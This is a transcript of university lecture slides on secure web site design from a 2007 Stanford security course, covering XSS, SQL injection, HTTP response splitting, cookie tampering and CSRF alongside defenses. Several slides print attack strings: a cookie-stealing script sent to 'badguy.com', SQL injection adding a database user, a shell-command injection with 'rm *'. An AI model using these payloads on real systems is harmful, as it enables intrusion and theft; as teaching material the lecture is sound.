Presentation is loading. Please wait.

Presentation is loading. Please wait.

1 Secure Web Site Design Dan Boneh CS 155 Spring 2007 Project 2: out today.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "1 Secure Web Site Design Dan Boneh CS 155 Spring 2007 Project 2: out today."— Presentation transcript:

1 1 Secure Web Site Design Dan Boneh CS 155 Spring 2007 Project 2: out today

2 2 Vulnerability Statistics: web is “winning” Source: MITRE CVE trends Majority of vulnerabilities now found in web software

3 3 Schematic web site architecture IDS Application Firewall (WAF) Firewall Load Balancer DB WS 1 WS 2 WS 3 Firewall Authorization Netegrity (CA) Oblix (Oracle) To CC processor App Servers

4 4 Web Application Firewalls Prevent some attacks we discuss today: SQL Injection Form field tampering Cookie poisoning Some examples: Imperva Kavado Interdo F5 TrafficShield Citrix NetScaler CheckPoint Web Intelligence

5 5 Our focus: web app code Common web-site attacks: Denial of Service: later in course Attack the web server (IIS, Apache) :  e.g. control hijacking: CodeRed, Nimda, …  Solutions: Harden web server: stackguard, libsafe, … Worm defense: later in course. Host based intrusion detection, Worm signatures generation, shields. Today: Common vulnerabilities in web application code

6 6 Web app code Runs on web server or app server. Takes input from web users (via web server) Interacts with the database and 3 rd parties. Prepares results for users (via web server) Examples: Shopping carts, home banking, bill pay, tax prep, … New code written for every web site. Written in: C, PHP, Perl, Python, JSP, ASP, … Often written with little consideration for security.

7 7 Background …

8 8 GET /default.asp HTTP/1.0 Accept: image/gif, image/x-bitmap, image/jpeg, */* Accept-Language: en User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95) Connection: Keep-Alive If-Modified-Since: Sunday, 17-Apr-96 04:32:58 GMT HTTP Request MethodFileHTTP versionHeaders Data – none for GET Blank line GET: no side effect. POST: possible side effect.

9 9 HTTP/1.0 200 OK Date: Sun, 21 Apr 1996 02:20:42 GMT Server: Microsoft-Internet-Information-Server/5.0 Connection: keep-alive Content-Type: text/html Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT Content-Length: 2543 Some data... blah, blah, blah HTTP Response HTTP versionStatus codeReason phrase Headers Data

10 10 Document Object Model (DOM) Object-oriented interface used to read and write docs web page in HTML is structured data DOM provides representation of this hierarchy Examples Properties: document.alinkColor, document.URL, document.forms[ ], document.links[ ], document.anchors[ ] Methods: document.write(document.referrer) Also Browser Object Model (BOM) Window, Document, Frames[], History, Location, Navigator (type and version of browser)

11 11 Cookies Used to store state on user’s machine Browser Server GET … HTTP Header: Set-cookie:NAME=VALUE ; domain = (who can read) ; expires = (when expires) ; secure = (only over SSL) Browser Server GET … Cookie: NAME = VALUE Http is stateless protocol; cookies add state If expires=NULL: this session only

12 12 Cookies Brower will store: At most 20 cookies/site, 3 KB / cookie Uses: User authentication Personalization User tracking: e.g. Doubleclick (3 rd party cookies)

13 13 Browser Same Origin Principle Web sites from different domains cannot interact except in very limited ways. Applies to: Cookies: cookie from origin A not visible to origin B Properties: script from origin A cannot read or set properties for origin B Two origins are the same iff Domain-name, port, and protocol are equal https://www.example.com:443/whoami http://www.example.com:443/hello Note: setting document.domain changes origin. Can only be set to suffix of domain name.

14 14 SOP Examples Example HTML at www.site.com Disallowed access: alert( frames[0].contentDocument.body.innerHTML ) alert( frames[0].src ) Allowed access: alert( images[0].height ) Note: SOP allows “send-only” communication with othersite

15 15 Web Application Vulnerabilities

16 16 Common vulnerabilities (OWASP) Inadequate validation of user input Cross site scripting SQL Injection HTTP Splitting Broken session management Can lead to session hijacking and data theft Insecure storage Sensitive data stored in the clear. Prime target for theft – e.g. egghead, Verizon. Note: PCI Data Security Standard (Visa, Mastercard)

17 17 Warm up: a simple example Direct use of user input: http://victim.com/ copy.php ? name=username copy.php: Problem:  http://victim.com/ copy.php ? name=“a ; rm *” (should be: name=a%20;%20rm%20* ) script namescript input system(“cp temp.dat $name.dat”)

18 18 Redirects EZShopper.com shopping cart (10/2004): http://…/cgi-bin/ loadpage.cgi ? page=url Redirects browser to url Redirects are common on many sites Used to track when user clicks on external link EZShopper uses redirect to add HTTP headers Problem: phishing http://victim.com/cgi-bin/loadpage ? page=phisher.com Link to victim.com puts user at phisher.com  Local redirects should ensure target URL is local

19 19 Cross Site Scripting (XSS)

20 20 The setup User input is echoed into HTML response. Example: search field http://victim.com/search.php ? term = apple search.php responds with: Search Results Results for :... Is this exploitable?

21 21 Bad input Problem: no validation of input term Consider link: (properly URL encoded) http://victim.com/search.php ? term = window.open( “http://badguy.com?cookie = ” + document.cookie ) What if user clicks on this link? 1.Browser goes to victim.com/search.php 2.Victim.com returns Results for … 3.Browser executes script:  Sends badguy.com cookie for victim.com

22 22 So what? Why would user click on such a link? Phishing email in webmail client (e.g. gmail). Link in doubleclick banner ad … many many ways to fool user into clicking What if badguy.com gets cookie for victim.com ? Cookie can include session auth for victim.com  Or other data intended only for victim.com  Violates same origin policy

23 23 Much worse … Attacker can execute arbitrary scripts in browser Can manipulate any DOM component on victim.com Control links on page Control form fields (e.g. password field) on this page and linked pages.  Example: inject password field that sends password to bad guy. Can infect other users: MySpace.com worm.

24 24 MySpace.com (Samy worm) Users can post HTML on their pages MySpace.com ensures HTML contains no,, onclick, … but can do Javascript within CSS tags: And can hide “javascript” as “java\nscript” With careful javascript hacking: Samy’s worm: infects anyone who visits an infected MySpace page … and adds Samy as a friend. Samy had millions of friends within 24 hours. More info: http://namb.la/popular/tech.html

25 25 Avoiding XSS bugs (PHP) Main problem: Input checking is difficult --- many ways to inject scripts into HTML. Preprocess input from user before echoing it PHP: htmlspecialchars(string) &  & "  " '  '  > htmlspecialchars( " Test ", ENT_QUOTES ); Outputs: <a href='test'>Test</a>

26 26 Avoiding XSS bugs (ASP.NET) ASP.NET 1.1: Server.HtmlEncode(string)  Similar to PHP htmlspecialchars validateRequest: (on by default)  Crashes page if finds in POST data.  Looks for hardcoded list of patterns.  Can be disabled:

27 27

28 28 httpOnly Cookies (IE) Browser Server GET … HTTP Header: Set-cookie:NAME=VALUE ; HttpOnly Cookie sent over HTTP(s), but not accessible to scripts cannot be read via document.cookie Helps prevent cookie theft via XSS … but does not stop most other risks of XSS bugs.

29 29 SQL Injection

30 30 The setup User input is used in SQL query Example: login page (ASP) set ok = execute(“SELECT * FROM UserTable WHERE username=′ ” & form(“user”) & “ ′ AND password=′ ” & form(“pwd”) & “ ′ ” ); If not ok.EOF login success else fail; Is this exploitable?

31 31 Bad input Suppose user = “ ′ or 1 = 1 -- ” (URL encoded) Then scripts does: ok = execute( SELECT … WHERE username= ′ ′ or 1=1 -- … ) The “--” causes rest of line to be ignored. Now ok.EOF is always false. The bad news: easy login to many sites this way.

32 32 Even worse Suppose user = ′ exec cmdshell ′ net user badguy badpwd ′ / ADD -- Then script does: ok = execute( SELECT … WHERE username= ′ ′ exec … ) If SQL server context runs as “sa”, attacker gets account on DB server.

33 33 Avoiding SQL injection Build SQL queries by properly escaping args: ′  \′ Example: Parameterized SQL: (ASP.NET 1.1) Ensures SQL arguments are properly escaped. SqlCommand cmd = new SqlCommand( "SELECT * FROM UserTable WHERE username = @User AND password = @Pwd", dbConnection); cmd.Parameters.Add("@User", Request[“user”] ); cmd.Parameters.Add("@Pwd", Request[“pwd”] ); cmd.ExecuteReader(); In PHP: bound parameters -- similar function

34 34 0x 5c  \ 0x bf 27  ¿′ 0x bf 5c  PHP addslashes () PHP: addslashes ( “ ’ or 1 = 1 -- ”) outputs: “ \’ or 1=1 -- ” Unicode attack: (GBK) $user = 0x bf 27 addslashes ($user)  0x bf 5c 27  Correct implementation: mysql_real_escape_string() ′

35 35 HTTP Response Splitting

36 36 The setup User input echoed in HTTP header. Example: Language redirect page (JSP) Browser sends http://.../by_lang.jsp ? lang=french Server HTTP Response: HTTP/1.1 302 (redirect) Date: … Location: /by_lang.jsp ? lang=french Is this exploitable?

37 37 Bad input Suppose browser sends: http://.../by_lang.jsp ? lang= “ french \n Content-length: 0 \r\n\r\n HTTP/1.1 200 OK Spoofed page ” (URL encoded)

38 38 Bad input HTTP response from server looks like: HTTP/1.1 302 (redirect) Date: … Location: /by_lang.jsp ? lang= french Content-length: 0 HTTP/1.1 200 OK Content-length: 217 Spoofed page lang

39 39 So what? What just happened: Attacker submitted bad URL to victim.com  URL contained spoofed page in it Got back spoofed page So what? Cache servers along path now store spoof of victim.com Will fool any user using same cache server Defense: don’t do that.

40 40 Summary thus far

41 41 App code Little programming knowledge can be dangerous: Cross site scripting SQL Injection HTTP Splitting What to do? Band-aid: Web App Firewall (WAF)  Looks for attack patterns and blocks requests  False positive / false negatives Code checking

42 42 Code checking Blackbox security testing services: Whitehatsec.com Automated blackbox testing tools: Cenzic, Hailstorm Spidynamic, WebInspect eEye, Retina Web application hardening tools: WebSSARI [WWW’04] : based on information flow Nguyen-Tuong [IFIP’05] : based on tainting

43 43 Session Management Cookies, hidden fields, and user authentication

44 44 Cookies Used to store state on user’s machine Browser Server GET … HTTP Header: Set-cookie:NAME=VALUE ; domain = (who can read) ; expires = (when expires) ; secure = (only over SSL) Browser Server GET … Cookie: NAME = VALUE Http is stateless protocol; cookies add state If expires=NULL: this session only

45 45 Cookie risks Danger of storing data on browser: User can change values Silly example: Shopping cart software. Set-cookie:shopping-cart-total = 150 ($) User edits cookie file (cookie poisoning): Cookie:shopping-cart-total = 15 ($) … bargain shopping. Similar behavior with hidden fields:

46 46 Not so silly … (as of 2/2005) D3.COM Pty Ltd: ShopFactory 5.8 @Retail Corporation: @Retail Adgrafix: Check It Out Baron Consulting Group: WebSite Tool ComCity Corporation: SalesCart Crested Butte Software: EasyCart Dansie.net: Dansie Shopping Cart Intelligent Vending Systems: Intellivend Make-a-Store: Make-a-Store OrderPage McMurtrey/Whitaker & Associates: Cart32 3.0 pknutsen@nethut.no: CartMan 1.04 Rich Media Technologies: JustAddCommerce 5.0 SmartCart: SmartCart Web Express: Shoptron 1.2 Source: http://xforce.iss.net/xforce/xfdb/4621

47 47 Example: dansie.net shopping cart http://www.dansie.net/demo.html (May, 2006) <FORM METHOD=POST ACTION="http://www.dansie.net/cgi-bin/scripts/cart.pl"> Black Leather purse with leather straps Price: $20.00 CVE-2000-0253 (Jan. 2001), BugTraq ID: 1115

48 48 Solution When storing state on browser MAC data using server secret key..NET 2.0: System.Web.Configuration.MachineKey  Secret web server key intended for cookie protection HttpCookie cookie = new HttpCookie(name, val); HttpCookie encodedCookie = HttpSecureCookie.Encode (cookie); HttpSecureCookie.Decode (cookie);

49 49 Cookie authentication Browser Web ServerAuth server POST login.cgi Username & pwd Validate user auth=val Store val Set-cookie: auth=val GET restricted.html Cookie: auth=val restricted.html auth=val YES/NOIf YES, restricted.html Check val

50 50 Weak authenticators: security risk Predictable cookie authenticator Verizon Wireless - counter Valid user logs in, gets counter, can view sessions of other users. Weak authenticator generation: [Fu et al. ’01] WSJ.com:cookie = {user, MAC k (user) } Weak MAC exposes K from few cookies. Apache Tomcat: generateSessionID() MD5(PRNG) … but weak PRNG [GM’05]. Predictable SessionID’s

51 51 Cross Site Request Forgery Example: User logs in to bank.com. Forgets to sign off. Session cookie remains in browser state Then user visits another site containing: … document.F.submit(); Browser sends user auth cookie with request  Transaction will be fulfilled Problem: cookie auth is insufficient when side effects can happen Correct use: use cookies + hidden fields

52 52 Take home message: On the web: Little programming knowledge can be a dangerous thing

53 53 THE END

Download ppt "1 Secure Web Site Design Dan Boneh CS 155 Spring 2007 Project 2: out today."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.

Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.
Cookie Same Origin Policy Dan Boneh CS 142 Winter 2009 Monday: session management using cookies.

Cookie Same Origin Policy Dan Boneh CS 142 Winter 2009 Monday: session management using cookies.
ForceHTTPS: Protecting High-Security Web Sites from Network Attacks Collin Jackson and Adam Barth.

ForceHTTPS: Protecting High-Security Web Sites from Network Attacks Collin Jackson and Adam Barth.
The OWASP Foundation Web Application Security Host Apps Firewall Host Apps Database Host Web serverApp serverDB server Securing the.

The OWASP Foundation Web Application Security Host Apps Firewall Host Apps Database Host Web serverApp serverDB server Securing the.
Session Management Dan Boneh CS 142 Winter 2009. Sessions A sequence of requests and responses from one browser to one (or more) sites Session can be.

Session Management Dan Boneh CS 142 Winter Sessions A sequence of requests and responses from one browser to one (or more) sites Session can be.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
1 Web Security: part 1. Vulnerability Stats: web is “winning” Source: MITRE CVE trends Majority of vulnerabilities now found in web software.

1 Web Security: part 1. Vulnerability Stats: web is “winning” Source: MITRE CVE trends Majority of vulnerabilities now found in web software.
CS426Fall 2010/Lecture 361 Computer Security CS 426 Lecture 41 StuxNet, Cross Site Scripting & Cross Site Request Forgery.

CS426Fall 2010/Lecture 361 Computer Security CS 426 Lecture 41 StuxNet, Cross Site Scripting & Cross Site Request Forgery.
1 Project 2: Web App Security Collin Jackson CS 155 Spring 2007.

1 Project 2: Web App Security Collin Jackson CS 155 Spring 2007.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.

Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
1 CS6320 – Web Security L. Grewe Modified from

1 CS6320 – Web Security L. Grewe Modified from
1 Secure Web Site Design Dan Boneh CS 155 Spring 2006.

1 Secure Web Site Design Dan Boneh CS 155 Spring 2006.
2/9/2004 Web and HTTP February 9, 2004. 2/9/2004 Assignments Due – Reading and Warmup Work on Message of the Day.

2/9/2004 Web and HTTP February 9, /9/2004 Assignments Due – Reading and Warmup Work on Message of the Day.
Web Security: Session Management

Web Security: Session Management
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.

Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009.

1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Cookies COEN 351 E-commerce Security. Client / Session Identification HTTP does not maintain state. State Information can be passed using: HTTP Headers.

Cookies COEN 351 E-commerce Security. Client / Session Identification HTTP does not maintain state. State Information can be passed using: HTTP Headers.

Similar presentations

Ads by Google